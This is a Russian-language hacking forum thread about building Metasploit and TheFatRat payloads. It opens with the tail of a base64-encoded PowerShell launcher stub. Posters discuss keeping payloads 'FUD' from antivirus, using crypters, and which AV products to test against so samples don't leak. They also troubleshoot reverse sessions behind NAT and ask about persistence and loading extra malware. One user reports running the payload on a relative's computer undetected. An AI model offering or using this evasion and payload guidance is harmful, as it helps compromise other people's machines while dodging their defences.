7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABoAGgAagBmACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGgAaABqAGYAIAAkAFgAUgBHACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFgAUgBHACAAJABlACIAOwB9AA=='"
это зашифрованный пэйлод в машинный код в base64 или еще какой нить что бы машина его понимала и чтобы антик не палил и плюс твой айпи не спалили куда твой зверек отстукивается (домой) при его ковырянии! (хотя спецы если займутся то по любому его найдут нетстатом или в шарке)))
 
I

Inject0r

Да практически все то же самое, что и в первой статье. ifconfig теперь не надо клацать.
Было бы здорово увидеть дальнейшее использование нагрузки метерпретера. Как закрепиться в системе, как поставить файл в автозагрузку. Подгрузка дополнительных вирусняков, и тп.

На торрентах можно скачать видеокурс по метерпретер от pentestit, там лекция часов на 8, про все это там рассказывается. Подробнее чем там никто не объяснит. Называется "Тестирование на проникновение с использованием Metasploit Framework"
 
Последнее редактирование модератором:
V

vanessa

Если по 2 Fudwin делать, то детект 12/38
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Если по 2 Fudwin делать, то детект 12/38

Есле будем и далее выкладывать на подобные детект ресурсы, будет 38/38.
Самый лучший вариант, да и пожалуй действенный для наших рельностей, это тест на 4 актуальных АВ - АК, ДВ, ЕА, АА. Потому как именно эти 4 продукта получила максимальное распространение на рынке РФ и бывшего СНГ, первые 2 занимают львиную долю коммерческого сектора и гос.структур, остальные мелкий бизнес, все вместе находят себе домик на юзер топах. Еще Панда и Авг есть. Почему я на этом заостряю внимание: давать всяким мульти тулзам на проверку хреново и не верно, основная причина слив, вторая неточность срабатывания. Для потенциальных пользоавтелей-тестеров: точно понимаем какую систему собираемся тестировать ( версию ОС, набор пакетов ( хотя бы примерный ), АВ, который вероятно установлен, можно попробовать 4 основных. Вот тогда будет получен результат близкий к правде.
Был загружен файл на проверку на один из онлайн сервисов, где напротив продукта на первую букву Е - стояла зеленая галочка, грузанули файл на комп - Е поднял панику. Вывод - возможно заторомженное обновление БД. Тестируя на своей железке Вы сами следите за обновлениями системы и можете более точно моделировать ситуацию.
 
Последнее редактирование:
  • Нравится
Реакции: valerian38
V

vanessa

Есле будем и далее выкладывать на подобные детект ресурсы, будет 38/38.
Самый лучший вариант, да и пожалуй действенный для наших рельностей, это тест на 4 актуальных АВ - АК, ДВ, ЕА, АА. Потому как именно эти 4 продукта получила максимальное распространение на рынке РФ и бывшего СНГ, первые 2 занимают львиную долю коммерческого сектора и гос.структур, остальные мелкий бизнес, все вместе находят себе домик на юзер топах. Еще Панда и Авг есть. Почему я на этом заостряю внимание: давать всяким мульти тулзам на проверку хреново и не верно, основная причина слив, вторая неточность срабатывания. Для потенциальных пользоавтелей-тестеров: точно понимаем какую систему собираемся тестировать ( версию ОС, набор пакетов ( хотя бы примерный ), АВ, который вероятно установлен, можно попробовать 4 основных. Вот тогда будет получен результат близкий к правде.
Был загружен файл на проверку на один из онлайн сервисов, где напротив продукта на первую букву Е - стояла зеленая галочка, грузанули файл на комп - Е поднял панику. Вывод - возможно заторомженное обновление БД. Тестируя на своей железке Вы сами следите за обновлениями системы и можете более точно моделировать ситуацию.
На какие подобные? Платные и не сливающие?
[doublepost=1501156709,1501156622][/doublepost]К тому же, если файл не FUD, то даже если и стоит антивирус и не детектит, то браузер все равно палит. Если FUD, то не палит
[doublepost=1501156864][/doublepost]Крипторы знакомые все им пользуются спокойно и никто не жаловался. Мозги есть слава богу у меня
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
related:virustotal.com поиск похожих сайтов related:<<<<этой командой мы говорим гуглу "найдика мне дружок похожие сайты по тематике!"

и к Ваше взору представится много сайтов и сервисов для проверки Ваших извояний!))

это Магия)
 
Последнее редактирование:
  • Нравится
Реакции: ghostphisher

jsat

Green Team
20.04.2017
30
8
BIT
1
Безымянный.jpg

Почему интернет не видеть не понимаю, хотя когда клонировал TheFatrat все нормально. Kali стоит в виртуалке, через WIndows 3G USB modem. Может кто знает как исправить ситуацию...
 
A

aza_fan

Посмотреть вложение 10932
Почему интернет не видеть не понимаю, хотя когда клонировал TheFatrat все нормально. Kali стоит в виртуалке, через WIndows 3G USB modem. Может кто знает как исправить ситуацию...
анонимайзер если включен, возможно он и мешает!!!
 
O

OneDollar

Товарищи, что может быть ? Не могу создать не exe, не андроид рат. Одна и та же ошибка.. metasploit v4.16.2-dev
 

Вложения

  • JIUhq9mpBjo.jpg
    JIUhq9mpBjo.jpg
    73,9 КБ · Просмотры: 437

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Пробуем писать расширение для файла. Если андроид то aaa.apk <--- APK
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Попробуй переставить - это удали, слей с гитхаба и ставь согласно инструкции.
 

mz111

Green Team
20.08.2017
77
73
BIT
0
TheFatRat работает,нагрузку запускал на виртуалке (Kali тоже на виртуалке) -всё отлично срабатывало но "в боевых условиях" (запускал на 2-х удалённых машинах,на одной Win XP на другой 7 ничего не получается..И bat и exe запускаются но сессии нет.При создании,в TheFatRat пробовал указывать и внутренний(ifconfig) и внешний ip(как я понимаю я за NAT),bind и reverse пэйлоады но безуспешно.Пожалуйста,подскажите - что не так ??
 
G

ghostik

палиться почти всеми антивирусами TheFatRat
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
сессии нет.При создании,в TheFatRat пробовал указывать и внутренний(ifconfig) и внешний ip(как я понимаю я за NAT),bind и reverse пэйлоады но безуспешно.Пожалуйста,подскажите - что не так ??

1) Опиши свой сетевой путь - от своего рабочего места до систему которую тестируешь
2) Гуглим - проброс портов + название твоего роутера ( если он есть ), если дело в NAT - тоже самое
 
  • Нравится
Реакции: mz111

mz111

Green Team
20.08.2017
77
73
BIT
0
Опиши свой сетевой путь - от своего рабочего места до систему которую тестируешь

Kali установлена на виртуальной машине которая на основной ОС -Win 7.В настройках вирт.машины тип подключения - NAT.Роутера у меня нет,инет по кабелю(оптоволокно).Машина на которой запускал нагрузку( комп родственников) в нашем городе,на ней Win XP,подсоединена к инету так же как и моя.Как я понимаю - я за NATом(ip на том же 2ip определяются другие чем в ipconfig и ifconfig в Kali и Windows)
[doublepost=1515232921,1515231419][/doublepost]
Гуглим - проброс портов + название твоего роутера ( если он есть ), если дело в NAT - тоже самое

Спасибо,буду разбираться.
[doublepost=1515233213][/doublepost]
палиться почти всеми антивирусами TheFatRat

Позавчера запускал батник на своей основной ОС ,Касперский фри (обновляется каждый день) не среагировал вообще,и на другом компе нортон секьюрити тоже не пикнул))
 

Shinobi

Green Team
23.11.2017
76
14
BIT
0
у меня при установке выдало
Код:
Mingw-w64 -> not found
Mingw-w32 -> not found
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!